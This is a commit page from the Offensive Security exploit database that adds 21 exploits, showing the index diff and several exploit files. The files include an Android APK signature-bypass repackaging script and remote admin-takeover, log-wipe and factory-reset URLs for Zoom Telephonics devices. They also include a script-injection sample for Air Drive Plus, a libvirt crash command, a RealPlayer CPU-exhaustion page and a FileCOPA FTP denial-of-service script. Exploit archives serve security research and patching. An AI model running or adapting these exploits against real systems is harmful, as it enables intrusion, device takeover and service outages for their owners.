Skip to content

Commit c4e7f4c

Browse files
author
Offensive Security
committed
DB: 2015-11-06
21 new exploits
1 parent 74c8d43 commit c4e7f4c

23 files changed

Lines changed: 2444 additions & 1 deletion

File tree

files.csv

Lines changed: 22 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -9233,7 +9233,7 @@ id,file,description,date,author,platform,type,port
92339233
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
92349234
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
92359235
9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0
9236-
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
9236+
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
92379237
9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0
92389238
9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
92399239
9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
@@ -34873,6 +34873,7 @@ id,file,description,date,author,platform,type,port
3487334873
38596,platforms/php/webapps/38596.txt,"Xaraya Multiple Cross Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0
3487434874
38597,platforms/multiple/remote/38597.txt,"Motion Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0
3487534875
38598,platforms/php/webapps/38598.txt,"ZamFoo 'date' Parameter Remote Command Injection Vulnerability",2013-06-15,localhost.re,php,webapps,0
34876+
38599,platforms/win32/remote/38599.py,"Symantec pcAnywhere 12.5.0 Windows x86 - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win32,remote,0
3487634877
38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - (Crawl website) Buffer OverFlow",2015-11-02,MandawCoder,windows,local,0
3487734878
38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow Exploit",2015-11-02,VIKRAMADITYA,windows,local,0
3487834879
38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0
@@ -34892,4 +34893,24 @@ id,file,description,date,author,platform,type,port
3489234893
38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use After Free",2015-11-03,"John Leitch",multiple,dos,0
3489334894
38617,platforms/windows/dos/38617.txt,"Python 2.7 strop.replace() Method - Integer Overflow",2015-11-03,"John Leitch",windows,dos,0
3489434895
38618,platforms/windows/dos/38618.txt,"Python 3.3 - 3.5 product_setstate() Function - Out-of-bounds Read",2015-11-03,"John Leitch",windows,dos,0
34896+
38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0
34897+
38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0
34898+
38630,platforms/php/webapps/38630.html,"phpVibe Information Disclosure and Remote File Include Vulnerabilities",2013-07-06,indoushka,php,webapps,0
3489534899
38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0
34900+
38621,platforms/php/webapps/38621.txt,"WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross Site Scripting Vulnerability",2013-06-30,"Prakhar Prasad",php,webapps,0
34901+
38622,platforms/linux/dos/38622.txt,"libvirt 'virConnectListAllInterfaces' Method Denial of Service Vulnerability",2013-07-01,"Daniel P. Berrange",linux,dos,0
34902+
38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer Denial of Service Vulnerability",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0
34903+
38624,platforms/php/webapps/38624.txt,"WordPress WP Feed Plugin 'nid' Parameter SQL Injection Vulnerability",2013-07-02,"Iranian Exploit DataBase",php,webapps,0
34904+
38625,platforms/php/webapps/38625.txt,"WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross Site Scripting Vulnerability",2013-07-02,"Iranian Exploit DataBase",php,webapps,0
34905+
38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server Remote Denial of Service Vulnerability",2013-07-01,Chako,multiple,dos,0
34906+
38627,platforms/android/remote/38627.sh,"Google Android 'APK' code Remote Security Bypass Vulnerability",2013-07-03,"Bluebox Security",android,remote,0
34907+
38628,platforms/php/webapps/38628.txt,"HostBill 'cpupdate.php' Authentication Bypass Vulnerability",2013-05-29,localhost.re,php,webapps,0
34908+
38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface Information Disclosure Vulnerability",2013-07-02,"Dan Farmer",multiple,remote,0
34909+
38634,platforms/ios/remote/38634.txt,"Air Drive Plus Multiple Input Vallidation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0
34910+
38635,platforms/php/webapps/38635.txt,"iVote 'details.php' SQL Injection Vulnerability",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0
34911+
38636,platforms/multiple/remote/38636.txt,"Cryptocat Chrome Extension 'img/keygen.gif' File Information Disclosure Vulnerability",2012-11-07,"Mario Heiderich",multiple,remote,0
34912+
38637,platforms/multiple/remote/38637.txt,"Cryptocat Arbitrary Script Injection Vulnerability",2015-11-07,"Mario Heiderich",multiple,remote,0
34913+
38638,platforms/php/webapps/38638.txt,"Mintboard Multiple Cross Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0
34914+
38639,platforms/php/webapps/38639.txt,"miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0
34915+
38640,platforms/multiple/webapps/38640.rb,"OpenSSL Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0
34916+
38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0

platforms/android/remote/38627.sh

Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
source: http://www.securityfocus.com/bid/60952/info
2+
3+
Google Android is prone to a remote security-bypass vulnerability.
4+
5+
Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.
6+
7+
#!/bin/bash
8+
# PoC for Android bug 8219321 by @pof
9+
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
10+
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
11+
APK=$1
12+
rm -r out out.apk tmp 2>/dev/null
13+
java -jar apktool.jar d $APK out
14+
#apktool d $APK out
15+
echo "Modify files, when done type 'exit'"
16+
cd out
17+
bash
18+
cd ..
19+
java -jar apktool.jar b out out.apk
20+
#apktool b out out.apk
21+
mkdir tmp
22+
cd tmp/
23+
unzip ../$APK
24+
mv ../out.apk .
25+
cat >poc.py <<-EOF
26+
#!/usr/bin/python
27+
import zipfile
28+
import sys
29+
z = zipfile.ZipFile(sys.argv[1], "a")
30+
z.write(sys.argv[2])
31+
z.close()
32+
EOF
33+
chmod 755 poc.py
34+
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
35+
cp out.apk ../evil-$APK
36+
cd ..
37+
rm -rf tmp out
38+
echo "Modified APK: evil-$APK"
Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
source: http://www.securityfocus.com/bid/61044/info
2+
3+
Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability.
4+
5+
Exploiting these issues could allow an attacker to gain unauthorized access and perform arbitrary actions, obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
Vulnerability proofs and examples-
8+
All administrative items can be accessed through these two URLs
9+
10+
--Menu Banner
11+
http://www.example.com/hag/pages/toc.htm
12+
13+
-Advanced Options Menu
14+
http://www.example.com/hag/pages/toolbox.htm
15+
16+
Example commands that can be executed remotely through a web browser
17+
URL, or a modified HTTP GET/POST requests-
18+
19+
-Change Password for admin Account
20+
21+
On Firmware 2.5 or lower
22+
http://www.example.com/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&ex_param1=
23+
admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes
24+
25+
On Firmware 3.0-
26+
http://www.example.com/hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_pa
27+
ram1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes
28+
29+
-Clear Logs
30+
http://www.example.com/Action?id=76&cmdClear+Log=Clear+Log
31+
32+
-Remote Reboot to Default Factory Settings-
33+
Warning - For all intents and purposes, this action will almost always
34+
result in a long term Denial of Service attack.
35+
http://www.example.com/Action?reboot_loc=1&id=5&cmdReboot=Reboot
36+
37+
-Create New Admin or Intermediate Account-
38+
On Firmware 2.5 or lower
39+
http://www.example.com/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateac
40+
count"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes
41+
42+
On Firmware 3.0-
43+
http://www.example.com/hag/emweb/PopOutUserAdd.htm?id=70&Zadv=1&ex_param1=adminuser
44+
_id="newadminaccount"&priv=v1&pass1="123456"&pass2="123456"&cmdSubmit=Sa
45+
ve+Changes

platforms/ios/remote/38634.txt

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
source: http://www.securityfocus.com/bid/61081/info
2+
3+
Air Drive Plus is prone to multiple input validation vulnerabilities including a local file-include vulnerability, an arbitrary file-upload vulnerability, and an HTML-injection vulnerability.
4+
5+
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, obtain sensitive information, execute arbitrary script code within the context of the browser, and steal cookie-based authentication credentials.
6+
7+
Air Drive Plus 2.4 is vulnerable; other versions may also be affected.
8+
9+
<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank"
10+
href="http://www.example.com/AirDriveAction_file_show/;/private/var/mobile/Applications";>;/private/var/mobile/Applications/</a></td>
11+
<td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center">
12+
<a onclick="javascript:delfile("/private/var/mobile/Applications");" class="transparent_button">Delete</a></td></tr>
13+
14+
<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank"
15+
href="http://www.example.com/AirDriveAction_file_show/1337.png.gif.php.js.html";>1337.png.gif.php.js.html</a></td>
16+
<td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center"><a
17+
onclick="javascript:delfile("1337.png.gif.php.js.html");"
18+
class="transparent_button">Delete</a></td></tr>
19+
20+
<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank"
21+
href="http://www.example.com/AirDriveAction_file_show/[PERSISTENT INJECTED SCRIPT CODE!]1337.png">[PERSISTENT
22+
INJECTED SCRIPT CODE!]1337.png</a></td><td>27,27KB</td><td align="center">
23+
2013-07-08 23:07:52</td><td align="center"><a onclick="javascript:delfile("[PERSISTENT INJECTED SCRIPT
24+
CODE!]1337.png");" class="transparent_button">Delete</a></td></tr>

platforms/linux/dos/38622.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/60876/info
2+
3+
libvirt is prone to a denial-of-service vulnerability.
4+
5+
Attackers can exploit this issue to crash the application that uses the affected library, denying service to legitimate users.
6+
7+
# virsh -c qemu:///system --readonly iface-list --inactive

platforms/multiple/dos/38623.html

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/60903/info
2+
3+
RealNetworks RealPlayer is prone to a remote denial-of-service vulnerability.
4+
5+
Successful exploits will allow attackers to consume an excessive amount of CPU resources, denying service to legitimate users.
6+
7+
RealPlayer 16.0.2.32 and prior are vulnerable.
8+
9+
<html> <head> <script language="JavaScript"> { var buffer = '\x41' for(i=0; i <= 100 ; ++i) { buffer+=buffer+buffer document.write(buffer); } } </script> </head> </html>

platforms/multiple/dos/38626.py

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
source: http://www.securityfocus.com/bid/60909/info
2+
3+
FileCOPA FTP Server is prone to a remote denial-of-service vulnerability.
4+
5+
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
6+
7+
FileCOPA FTP Server 7.01 is vulnerable; other versions may also be affected.
8+
9+
#!/usr/bin/python
10+
11+
import socket
12+
import sys
13+
14+
15+
PAYLOAD = "\x41" * 7000
16+
17+
18+
print("\n\n[+] FileCOPA V7.01 HTTP POST Denial Of Service")
19+
print("[+] Version: V7.01")
20+
print("[+] Chako\n\n\n")
21+
22+
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
23+
s.connect(('www.example.com',81))
24+
25+
s.send("POST /" + PAYLOAD + "/ HTTP/1.0\r\n\r\n")
26+
27+
28+
s.close()
29+
print("[!] Done! Exploit successfully sent\n")
30+
31+

0 commit comments

Comments
 (0)